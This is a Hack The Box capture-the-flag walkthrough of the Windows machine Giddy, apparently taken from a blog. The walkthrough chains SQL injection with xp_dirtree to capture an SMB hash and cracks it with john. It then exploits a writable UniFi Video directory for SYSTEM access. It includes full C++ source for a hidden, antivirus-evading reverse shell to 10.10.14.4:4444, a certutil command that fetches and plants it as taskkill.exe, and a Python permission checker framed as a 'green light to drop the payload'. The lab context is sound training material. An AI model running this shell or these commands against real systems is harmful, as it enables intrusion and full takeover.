Giddy – HACK THE BOX

Hello Hackers!!!

In this blog post we are going to solve GIDDY, a machine from Hack The Box. GIDDY is an interesting and tricky box; its user ratings are good, and the community rates its difficulty at around 7 or 8 out of 10.

Index

  • About Box
  • Enumeration
    • Port Scanning
    • Enumeration on port 80 (HTTP Service)
      • Directory Brute Forcing
  • SQL Injection
    • Xp_dirtree Command Execution
  • SMB Server hash
  • Cracking Hash With John
  • Getting User
  • Post Enumeration
  • Privilege Escalation
    • unifi-video Local Privilege Escalation

About Box

Level: Intermediate
OS: Windows
IP Address: 10.10.10.104

Let's get started!!!

Enumeration

Let's start with port scanning.

Nmap Port Scanning

Command

nmap 10.10.10.104

Nmap aggressive (-A) and service-version (-sV) scan, to get more detailed information.

Command

nmap 10.10.10.104 -sV -A

Let's see what's on port 80.

Directory Brute-forcing on Port 80 using gobuster.

Command

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.104 -t 20 -x php,asp,aspx,txt

Two interesting directories:

/remote
/mvc

Let's look at /remote first.

URL: https://10.10.10.104/Remote/en-US/logon.aspx?ReturnUrl=%2fremote%2f

Cool, a PowerShell Web Access login page. But we need credentials to log in, so let's try the second directory.

URL: http://10.10.10.104/mvc/
URL: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18

We have an ID parameter in the URL, so I appended a single quote to test for SQL injection and got a database error back.

URL: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18%27

SQL Injection

Superb!!! We have SQL injection here. Unfortunately SQLMap did not return anything useful like usernames or passwords.

After some research I found that MS-SQL has an undocumented stored procedure, master..xp_dirtree, which lists the contents of a directory. It does not execute commands, but it accepts a UNC path, and when the path points at a remote host the SQL Server service account authenticates to that host over SMB. Because the injection point allows stacked queries (the ; after the numeric parameter), we can call it from the URL.

What I am going to do here is start an SMB capture server on my Kali box using Metasploit, then use xp_dirtree to make Giddy connect to it. The account that the SQL Server service runs as (on Giddy this turns out to be Stacy) will authenticate to my SMB server, and the capture module records the NetNTLMv2 challenge/response, which we can then crack offline.

Msfconsole

msf > use auxiliary/server/capture/smb
msf auxiliary(server/capture/smb) > show options
msf auxiliary(server/capture/smb) > set JOHNPWFILE /root/extra/Giddy/hash
msf auxiliary(server/capture/smb) > run

Triggering the SMB connection with xp_dirtree

URL: https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=0;%20exec%20master..xp_dirtree%20%27\\10.10.14.4\asd.txt%27,1,
The request made Giddy connect back to the capture server:

Username: Stacy
Domain: GIDDY
NTHASH: c0abbe54b3881103a74614362605aa7

The full challenge/response was written to /root/extra/Giddy/hash (the capture module appends _netntlmv2 to the JOHNPWFILE name, so the file to crack is hash_netntlmv2).

Let’s use john to crack the hash 😉

Command

john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash_netntlmv2

Nice Job!!! Password Recovered Successfully.

Password: xNnWo6272k7x

Now we have the user, password and domain.
Let's try to log in to PowerShell Web Access.

URL: https://10.10.10.104/Remote/en-US/logon.aspx

Awesome, we have remote PowerShell command execution.

And here is user.txt on Stacy's Desktop.

Post Enumeration

In Stacy's Documents folder I found an installer for a program: unifi-video.

After some searching I found that this version of UniFi Video is vulnerable to local privilege escalation: the service runs with high privileges and, when it stops, calls taskkill.exe by a relative name from its own installation directory instead of from System32.

After a bit of poking around I found the service's installation directory under C:\Users\All Users (a junction to C:\ProgramData) and checked its permissions with icacls.

Command

PS C:\Users\All Users> icacls .\unifi-video

Cool!! The directory is writable by unprivileged users, so the service is vulnerable. All we have to do is place an executable named taskkill.exe containing our reverse shell in that directory and then stop or restart the service.
I tried various msfvenom payloads, but none of them survived on Giddy: the box runs some kind of endpoint protection (antivirus) that removes them as soon as they land.
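The icacls output itself is not shown above, so as an added example (mine, not part of the original post) here is a small Python checker for the condition the taskkill.exe swap depends on: it parses icacls output and flags ACEs that give an unprivileged principal the right to create or replace files in the service directory. The two icacls listings embedded below are constructed samples, not Giddy's real output; the queried path is .\unifi-video to match the command above.

```python
import re

# Principals an unprivileged interactive user normally holds in their token.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that let a principal create or replace files under the directory:
# simple rights F/M/W and the specific rights WD (create files), AD (create
# subdirectories), WA (append), DC (delete child), WDAC/WO (rewrite DACL/owner).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "DC", "WDAC", "WO"}


def parse_icacls(output: str, path: str):
    """Return [(principal, [tokens])] from `icacls <path>` output.

    icacls prints the path once, in front of the first ACE; later ACEs are
    indented. Each ACE looks like PRINCIPAL:(flag)(flag)(right[,right]).
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Successfully processed", "Failed processing")):
            continue
        if line.startswith(path + " "):
            line = line[len(path) + 1:].lstrip()
        principal, sep, rights = line.partition(":(")
        if not sep:
            continue
        tokens = [t.strip().upper()
                  for group in re.findall(r"\(([^)]*)\)", "(" + rights)
                  for t in group.split(",")]
        aces.append((principal.strip(), tokens))
    return aces


def writable_by_low_priv(output: str, path: str):
    """Flag ACEs granting write rights to low-privilege principals.

    Returns [(principal, sorted write rights, scope)], where scope is
    'directory' when the ACE applies to the directory itself (a new
    taskkill.exe can be dropped there) or 'children only' for (IO)
    inherit-only ACEs (only existing files/subdirectories are affected).
    """
    findings = []
    for principal, tokens in parse_icacls(output, path):
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        if "DENY" in tokens:  # a deny ACE removes rights, it never grants them
            continue
        granted = sorted(WRITE_RIGHTS & set(tokens))
        if not granted:
            continue
        scope = "children only" if "IO" in tokens else "directory"
        findings.append((principal, granted, scope))
    return findings


# Constructed sample (not the real Giddy listing): BUILTIN\Users may create
# files and subdirectories in the service directory, the precondition for the swap.
SAMPLE_VULNERABLE = r"""
.\unifi-video NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)
              BUILTIN\Users:(OI)(CI)(RX)
              BUILTIN\Users:(CI)(AD)
              BUILTIN\Users:(CI)(WD)
              CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample of a locked-down install directory: users only read/execute.
SAMPLE_SAFE = r"""
.\unifi-video NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)
              BUILTIN\Users:(OI)(CI)(RX)
              Everyone:(OI)(CI)(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for principal, rights, scope in writable_by_low_priv(SAMPLE_VULNERABLE, r".\unifi-video"):
        print(f"{principal} can {','.join(rights)} ({scope})")
```

On a real box, run icacls on the directory and on the executables the service launches, feed the text to writable_by_low_priv with the same path string you passed to icacls, and treat any 'directory' scoped finding for Users or Everyone as the green light to drop the payload.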

Privilege Escalation

So I decided to write my own reverse shell in C++, which the antivirus did not flag.

#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "Ws2_32.lib")
#define REMOTE_ADDR "10.10.14.4"
#define REMOTE_PORT "4444"

int main(int argc, char *argv[])
{
    FreeConsole(); // detach from the console so no window is shown
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0)
        return 1;

    // Resolve the listener address (REMOTE_ADDR:REMOTE_PORT)
    struct addrinfo *result = NULL, *ptr = NULL, hints;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    if (getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result) != 0)
        return 1;
    ptr = result;

    // WSASocket without WSA_FLAG_OVERLAPPED: the handle can be used directly as a std handle
    SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, 0, 0);
    if (ConnectSocket == INVALID_SOCKET)
        return 1;
    if (connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen) == SOCKET_ERROR)
        return 1;
    freeaddrinfo(result);

    // Spawn a hidden cmd.exe with stdin/stdout/stderr redirected to the socket
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = (HANDLE)ConnectSocket;
    si.hStdOutput = (HANDLE)ConnectSocket;
    si.hStdError = (HANDLE)ConnectSocket;
    TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
    // bInheritHandles = TRUE so cmd.exe inherits the socket handle
    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(ConnectSocket);
    WSACleanup();
    return 0;
}

Then I compiled it on my own Windows machine with Visual Studio, targeting x64 since Giddy is a 64-bit OS.

Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\10>cd "c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build"
c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build>vcvars32.bat amd64

** Visual Studio 2017 Developer Command Prompt v15.7.6
** Copyright (c) 2017 Microsoft Corporation

[vcvarsall.bat] Environment initialized for: 'x64'
c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build>
c:\Users\10\Documents>cl shell.cpp
Microsoft (R) C/C++ Optimizing Compiler Version 19.14.26433 for x64
Copyright (C) Microsoft Corporation. All rights reserved.
shell.cpp
Microsoft (R) Incremental Linker Version 14.14.26433.0
Copyright (C) Microsoft Corporation. All rights reserved.
/out:shell.exe
shell.obj
c:\Users\10\Documents>

I copied shell.exe to my Kali box, served it over HTTP, and pulled it down onto Giddy with certutil, saving it directly as taskkill.exe in the unifi-video directory.

Command

PS C:\Users\All Users\unifi-video> 
cmd.exe /k certutil -urlcache -split -f http://10.10.14.4/shell.exe 'C:\Users\All Users\unifi-video\taskkill.exe'
CertUtil: -URLCache command completed successfully.

After a bit more searching I found that the service is driven by airvision.jar, and that stopping it through java makes the service invoke taskkill.exe. Because it is called by a relative name, our taskkill.exe in the install directory is the one that runs, with the privileges of the service.

So, I started a listener using nc.

Command

nc -nlvp 4444

and stopped the service using java.

Command

java -jar .\lib\airvision.jar stop

Great!! Successfully got the shell.

And here is root.txt on the Administrator's Desktop.

Congrats!!

Thank you for reading. If you have any issue. just drop a comment below 😉
